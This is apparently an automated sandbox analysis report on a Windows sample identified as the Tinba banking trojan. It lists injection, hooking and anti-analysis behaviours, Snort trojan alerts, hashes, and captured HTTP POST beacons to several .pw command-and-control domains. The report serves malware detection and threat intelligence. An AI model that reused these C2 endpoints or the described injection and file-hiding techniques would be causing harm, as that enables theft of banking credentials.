Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
java.exe

Overview

General Information

Sample name:java.exe
Analysis ID:1364228
MD5:0411c0706f66b49aa6bef1528606ee31
SHA1:bdb8cb7a8aa380138ab9220075bb08b03a5edc28
SHA256:9e6e9d8eabba4b886fa84170137e3a72c35cc7b360a5cba1a08cbc6b6f468a3c
Tags:exetinba
Infos:

Detection

Tinba
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Tinba Banker
Allocates memory in foreign processes
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Creates autostart registry keys with suspicious names
Exploit detected, runtime environment starts unknown processes
Hooks files or directories query functions (used to hide files and directories)
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • java.exe (PID: 6188 cmdline: C:\Users\user\Desktop\java.exe MD5: 0411C0706F66B49AA6BEF1528606EE31)
    • conhost.exe (PID: 6212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • winver.exe (PID: 6384 cmdline: winver MD5: B5471B0FB5402FC318C82C994C6BF84D)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • bin.exe (PID: 6940 cmdline: "C:\Users\user\AppData\Roaming\E38A1E29\bin.exe" MD5: CB95EC2B6EF058D45AA18CD146471002)
          • conhost.exe (PID: 7012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • bin.exe (PID: 1196 cmdline: "C:\Users\user\AppData\Roaming\E38A1E29\bin.exe" MD5: CB95EC2B6EF058D45AA18CD146471002)
          • conhost.exe (PID: 352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sihost.exe (PID: 3420 cmdline: sihost.exe MD5: A21E7719D73D0322E2E7D61802CB8F80)
      • svchost.exe (PID: 3456 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 3528 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • ctfmon.exe (PID: 3832 cmdline: ctfmon.exe MD5: B625C18E177D5BEB5A6F6432CCF46FB3)
      • svchost.exe (PID: 4196 cmdline: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • StartMenuExperienceHost.exe (PID: 4660 cmdline: "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca MD5: 5CDDF06A40E89358807A2B9506F064D9)
      • RuntimeBroker.exe (PID: 4872 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • SearchApp.exe (PID: 4984 cmdline: "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca MD5: 5E1C9231F1F1DCBA168CA9F3227D9168)
      • RuntimeBroker.exe (PID: 5092 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • smartscreen.exe (PID: 5584 cmdline: C:\Windows\System32\smartscreen.exe -Embedding MD5: 02FB7069B8D8426DC72C9D8A495AF55A)
      • TextInputHost.exe (PID: 3788 cmdline: "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca MD5: F050189D49E17D0D340DE52E9E5B711F)
      • RuntimeBroker.exe (PID: 5116 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • RuntimeBroker.exe (PID: 1532 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • ApplicationFrameHost.exe (PID: 5736 cmdline: C:\Windows\system32\ApplicationFrameHost.exe -Embedding MD5: D58A8A987A8DAFAD9DC32A548CC061E7)
      • WinStore.App.exe (PID: 2524 cmdline: "C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe" -ServerName:App.AppXc75wvwned5vhz4xyxxecvgdjhdkgsdza.mca MD5: 6C44453CD661FC2DB18E4C09C4940399)
      • RuntimeBroker.exe (PID: 1760 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • SystemSettings.exe (PID: 6060 cmdline: "C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel MD5: 3CD3CD85226FCF576DFE9B70B6DA2630)
      • UserOOBEBroker.exe (PID: 3924 cmdline: C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding MD5: BCE744909EB87F293A85830D02B3D6EB)
      • svchost.exe (PID: 5040 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • conhost.exe (PID: 3300 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • dllhost.exe (PID: 2912 cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • backgroundTaskHost.exe (PID: 6064 cmdline: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppX4325622ft6437f3xfywcfxgbedfvpn0x.mca MD5: DA7063B17DBB8BBB3015351016868006)
      • RuntimeBroker.exe (PID: 4504 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • RuntimeBroker.exe (PID: 6016 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • KIdSIJzxFEgRWLYApSEFvZXik.exe (PID: 4852 cmdline: "C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • KIdSIJzxFEgRWLYApSEFvZXik.exe (PID: 5144 cmdline: "C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • KIdSIJzxFEgRWLYApSEFvZXik.exe (PID: 4588 cmdline: "C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • KIdSIJzxFEgRWLYApSEFvZXik.exe (PID: 1260 cmdline: "C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • KIdSIJzxFEgRWLYApSEFvZXik.exe (PID: 2496 cmdline: "C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • KIdSIJzxFEgRWLYApSEFvZXik.exe (PID: 4600 cmdline: "C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • KIdSIJzxFEgRWLYApSEFvZXik.exe (PID: 5356 cmdline: "C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • KIdSIJzxFEgRWLYApSEFvZXik.exe (PID: 4464 cmdline: "C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • KIdSIJzxFEgRWLYApSEFvZXik.exe (PID: 2380 cmdline: "C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • KIdSIJzxFEgRWLYApSEFvZXik.exe (PID: 2852 cmdline: "C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
TinbaF-Secure notes that TinyBanker or short Tinba is usually distributed through malvertising (advertising content that leads the user to sites hosting malicious threats), exploit kits and spam email campaigns. According to news reports, Tinba has been found targeting bank customers in the United States and Europe.If Tinba successfully infects a device, it can steal banking and personal information through webinjects. To do this, the malware monitors the user's browser activity and if specific banking portals are visited, Tinba injects code to present the victim with fake web forms designed to mimic the legitimate web site. The malware then tricks them into entering their personal information, log-in credentials, etc in the legitimate-looking page.Tinba may also display socially-engineered messages to lure or pressure the user into entering their information on the fake page; for example, a message may be shown which attempts to convince the victim that funds were accidentally deposited to his account and must be refunded immediately.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.tinba

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: java.exe PID: 6188JoeSecurity_TinbaYara detected Tinba BankerJoe Security
    Process Memory Space: winver.exe PID: 6384JoeSecurity_TinbaYara detected Tinba BankerJoe Security
      Process Memory Space: explorer.exe PID: 2580JoeSecurity_TinbaYara detected Tinba BankerJoe Security
        Process Memory Space: sihost.exe PID: 3420JoeSecurity_TinbaYara detected Tinba BankerJoe Security
          Process Memory Space: svchost.exe PID: 3456JoeSecurity_TinbaYara detected Tinba BankerJoe Security
            Click to see the 7 entries

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            Timestamp:192.168.2.4104.131.68.18049736802020418 12/19/23-00:41:44.628603
            SID:2020418
            Source Port:49736
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249737802020418 12/19/23-00:41:46.120627
            SID:2020418
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4104.131.68.18049736802830613 12/19/23-00:41:44.628603
            SID:2830613
            Source Port:49736
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249738802024659 12/19/23-00:41:47.666890
            SID:2024659
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4104.131.68.18049736802024659 12/19/23-00:41:44.628603
            SID:2024659
            Source Port:49736
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249738802020418 12/19/23-00:41:47.666890
            SID:2020418
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249735802020418 12/19/23-00:41:33.880543
            SID:2020418
            Source Port:49735
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249735802024659 12/19/23-00:41:33.880543
            SID:2024659
            Source Port:49735
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249737802024659 12/19/23-00:41:46.120627
            SID:2024659
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: java.exeAvira: detected
            Antivirus detection for URL or domain
            Source: http://spaines.pw/EiDQjNbWEQ/Avira URL Cloud: Label: malware
            Source: http://uyhgqunqkxnx.pw/EiDQjNbWEQ/Avira URL Cloud: Label: malware
            Source: http://cmnsgscccrej.pw/EiDQjNbWEQ/Avira URL Cloud: Label: malware
            Source: http://vcklmnnejwxx.pw/EiDQjNbWEQ/Avira URL Cloud: Label: malware
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exeAvira: detection malicious, Label: HEUR/AGEN.1322420
            Multi AV Scanner detection for submitted file
            Source: java.exeReversingLabs: Detection: 89%
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: java.exeJoe Sandbox ML: detected
            Source: C:\Windows\SysWOW64\winver.exeCode function: 2_2_047E2DCF CryptAcquireContextA,CryptImportPublicKeyInfo,CryptCreateHash,CryptHashData,CryptVerifySignatureA,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,2_2_047E2DCF
            Source: java.exeBinary or memory string: -----BEGIN PUBLIC KEY----- MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAldMoUs9Ytg4Z6u+LBejj XsQpi94U2CbOGCF5DieMHxzcr5nhleioQixxAah9IEXJgzZ8Ag69xjMADnuKMumV xOFw6SbeOhRGrT/al5Rv/X56bsKPBBn5UAR5xhzUielXM77Z8R0oKVOKfXYDXdMq hx6FPFOOnV4/H7u3zf0sUbHXjbJEamXSjWRd0O
            Source: java.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
            Source: unknownHTTPS traffic detected: 173.222.162.32:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: KIdSIJzxFEgRWLYApSEFvZXik.exe, 0000002B.00000002.2969338843.000000000051E000.00000002.00000001.01000000.00000007.sdmp

            Software Vulnerabilities

            barindex
            Exploit detected, runtime environment starts unknown processes
            Source: C:\Users\user\Desktop\java.exeProcess created: C:\Windows\System32\conhost.exe

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49735 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49735 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49736 -> 104.131.68.180:80
            Source: TrafficSnort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49736 -> 104.131.68.180:80
            Source: TrafficSnort IDS: 2830613 ETPRO TROJAN W32/Chthonic CnC Activity 192.168.2.4:49736 -> 104.131.68.180:80
            Source: TrafficSnort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49737 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49737 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49738 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49738 -> 216.218.185.162:80
            Source: global trafficHTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0Host: spaines.pwContent-Length: 157Data Raw: 17 df be d8 01 d5 be d8 79 91 65 5a 11 dd bf fb 27 ef 8e e8 27 ef 8e e8 Data Ascii: yeZ''
            Source: global trafficHTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0Host: uyhgqunqkxnx.pwContent-Length: 157Data Raw: df a3 ff f3 c4 a9 ff f3 b1 ed 24 71 d9 a1 fe d0 ef 93 cf c3 ef 93 cf c3 Data Ascii: $q
            Source: global trafficHTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0Host: vcklmnnejwxx.pwContent-Length: 157Data Raw: 44 9d 81 a8 58 97 81 a8 2a d3 5a 2a 42 9f 80 8b 74 ad b1 98 74 ad b1 98 Data Ascii: DX*Z*Btt
            Source: global trafficHTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0Host: cmnsgscccrej.pwContent-Length: 157Data Raw: 38 28 9d 64 25 22 9d 64 56 66 46 e6 3e 2a 9c 47 08 18 ad 54 08 18 ad 54 Data Ascii: 8(d%"dVfF>*GTT
            Source: Joe Sandbox ViewIP Address: 216.218.185.162 216.218.185.162
            Source: Joe Sandbox ViewASN Name: HURRICANEUS HURRICANEUS
            Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
            Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
            Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHContent-type: text/xmlX-Agent-DeviceId: 01000A4109000CC6X-BM-CBT: 1696420817X-BM-DateFormat: dd/MM/yyyyX-BM-DeviceDimensions: 784x984X-BM-DeviceDimensionsLogical: 784x984X-BM-DeviceScale: 100X-BM-DTZ: 60X-BM-Market: CHX-BM-Theme: 000000;0078d7X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Device-ClientSession: 0912CF9094994CFA88DE52C6FB19D4E1X-Device-isOptin: falseX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-Device-OSSKU: 48X-Device-Touch: falseX-DeviceID: 01000A4109000CC6X-MSEdge-ExternalExp: bfbwsbrs0830tf,d-thshldspcl40,msbdsborgv2co,msbwdsbi920t1,spofglclicksh-c2,webtophit0r_t,wsbmsaqfuxtc,wsbqfasmsall_t,wsbqfminiserp400,wsbref-tX-MSEdge-ExternalExpType: JointCoordX-PositionerType: DesktopX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateX-Search-TimeZone: Bias=0; DaylightBias=-60; TimeZoneKeyName=GMT Standard TimeX-UserAgeClass: UnknownAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comContent-Length: 2232Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=6666694284484FA1B35CCB433D42E997; _SS=SID=193A581F83766B4319784BBF829B6A16&CPID=1696420820117&AC=1&CPH=e5c79613&CBV=39942242; _EDGE_S=SID=193A581F83766B4319784BBF829B6A16; SRCHUID=V=2&GUID=BA43D82178364AEA9C1EE6C32BE93416&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231003; SRCHHPGUSR=SRCHLANG=en&LUT=1696420817741&IPMH=425591ef&IPMID=1696420817913&HV=1696417346; ANON=A=6D8F9DF00282E660E425530EFFFFFFFF; CortanaAppUID=4C9C2B2D0465FD7A42C74C7E93CFB630; MUIDB=6666694284484FA1B35CCB433D42E997
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Windows\SysWOW64\winver.exeCode function: 2_2_047E2F88 send,send,recv,closesocket,2_2_047E2F88
            Source: unknownDNS traffic detected: queries for: spaines.pw
            Source: unknownHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHContent-type: text/xmlX-Agent-DeviceId: 01000A4109000CC6X-BM-CBT: 1696420817X-BM-DateFormat: dd/MM/yyyyX-BM-DeviceDimensions: 784x984X-BM-DeviceDimensionsLogical: 784x984X-BM-DeviceScale: 100X-BM-DTZ: 60X-BM-Market: CHX-BM-Theme: 000000;0078d7X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Device-ClientSession: 0912CF9094994CFA88DE52C6FB19D4E1X-Device-isOptin: falseX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-Device-OSSKU: 48X-Device-Touch: falseX-DeviceID: 01000A4109000CC6X-MSEdge-ExternalExp: bfbwsbrs0830tf,d-thshldspcl40,msbdsborgv2co,msbwdsbi920t1,spofglclicksh-c2,webtophit0r_t,wsbmsaqfuxtc,wsbqfasmsall_t,wsbqfminiserp400,wsbref-tX-MSEdge-ExternalExpType: JointCoordX-PositionerType: DesktopX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateX-Search-TimeZone: Bias=0; DaylightBias=-60; TimeZoneKeyName=GMT Standard TimeX-UserAgeClass: UnknownAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comContent-Length: 2232Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=6666694284484FA1B35CCB433D42E997; _SS=SID=193A581F83766B4319784BBF829B6A16&CPID=1696420820117&AC=1&CPH=e5c79613&CBV=39942242; _EDGE_S=SID=193A581F83766B4319784BBF829B6A16; SRCHUID=V=2&GUID=BA43D82178364AEA9C1EE6C32BE93416&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231003; SRCHHPGUSR=SRCHLANG=en&LUT=1696420817741&IPMH=425591ef&IPMID=1696420817913&HV=1696417346; ANON=A=6D8F9DF00282E660E425530EFFFFFFFF; CortanaAppUID=4C9C2B2D0465FD7A42C74C7E93CFB630; MUIDB=6666694284484FA1B35CCB433D42E997
            Source: explorer.exe, 00000003.00000000.1715884676.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3084368988.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1713964202.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
            Source: svchost.exe, 00000006.00000002.3025882268.0000019E29FC7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3026550314.0000019E29FCA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.1795301212.0000019E29FCA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
            Source: explorer.exe, 00000003.00000000.1715884676.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3084368988.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1713964202.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
            Source: svchost.exe, 00000006.00000002.3025882268.0000019E29FC7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3026550314.0000019E29FCA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.1795301212.0000019E29FCA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
            Source: SearchApp.exe, 0000000B.00000000.1827278453.0000024B41348000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1840873224.0000024B4247F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
            Source: explorer.exe, 00000003.00000000.1715884676.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3084368988.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1713964202.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
            Source: svchost.exe, 00000006.00000002.3025882268.0000019E29FC7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3026550314.0000019E29FCA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.1795301212.0000019E29FCA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
